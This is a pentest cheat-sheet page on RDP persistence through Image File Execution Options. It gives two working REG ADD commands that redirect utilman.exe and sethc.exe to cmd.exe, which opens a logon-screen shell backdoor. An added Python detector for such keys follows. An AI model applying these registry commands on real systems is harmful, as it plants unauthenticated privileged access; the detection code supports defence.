# RDP Backdoors

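If you have RDP access to a machine, you can set these Image File Execution Options (IFEO) keys for persistence. With a `Debugger` value set under an image's IFEO key, Windows starts the named program in place of that image.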

## **utilman.exe**

At the login screen, press Windows Key+U.

```
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
```

## **sethc.exe**

Hit F5 a bunch of times when you are at the RDP login screen.

```
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
```
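
To check a host for the two keys above, the following added example (not part of the original page) parses the text output of `reg query ... /s` over the IFEO key and flags every `Debugger` value. The function name, the sample data, and the accessibility binaries beyond `utilman.exe` and `sethc.exe` are assumptions of this example.

```python
# Input: text captured on the host with
#   reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s
IFEO = r"\microsoft\windows nt\currentversion\image file execution options" + "\\"

# Binaries that can be launched from the logon screen. The page names the first two;
# the rest are an assumption added here for broader coverage.
LOGON_SCREEN_IMAGES = {"utilman.exe", "sethc.exe", "osk.exe", "magnify.exe",
                       "narrator.exe", "displayswitch.exe", "atbroker.exe"}

def find_ifeo_debuggers(reg_query_output):
    """Return one finding per IFEO image key that carries a Debugger value."""
    findings, image = [], None
    for line in reg_query_output.splitlines():
        if line.upper().startswith("HKEY_"):
            low = line.strip().lower()
            idx = low.find(IFEO)
            rest = low[idx + len(IFEO):] if idx != -1 else ""
            # Only direct children of IFEO are image names; skip deeper subkeys.
            image = rest if rest and "\\" not in rest else None
            continue
        parts = line.strip().split("    ", 2)  # reg.exe separates name/type/data with 4 spaces
        if image and len(parts) == 3 and parts[0].lower() == "debugger":
            severity = "high" if image in LOGON_SCREEN_IMAGES else "review"
            findings.append({"image": image, "debugger": parts[2].strip(), "severity": severity})
    return findings

# Constructed sample output, not taken from a real host.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
    UseFilter    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe
    Debugger    REG_SZ    C:\windows\system32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
    Debugger    REG_SZ    C:\windows\system32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\myapp.exe
    Debugger    REG_SZ    C:\Tools\vsjitdebugger.exe
"""

if __name__ == "__main__":
    for f in find_ifeo_debuggers(SAMPLE):
        print(f"[{f['severity']}] {f['image']} -> {f['debugger']}")
```

A `high` finding means a logon-screen binary has been redirected; a `review` finding is a `Debugger` value on any other image, which can be legitimate developer tooling.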

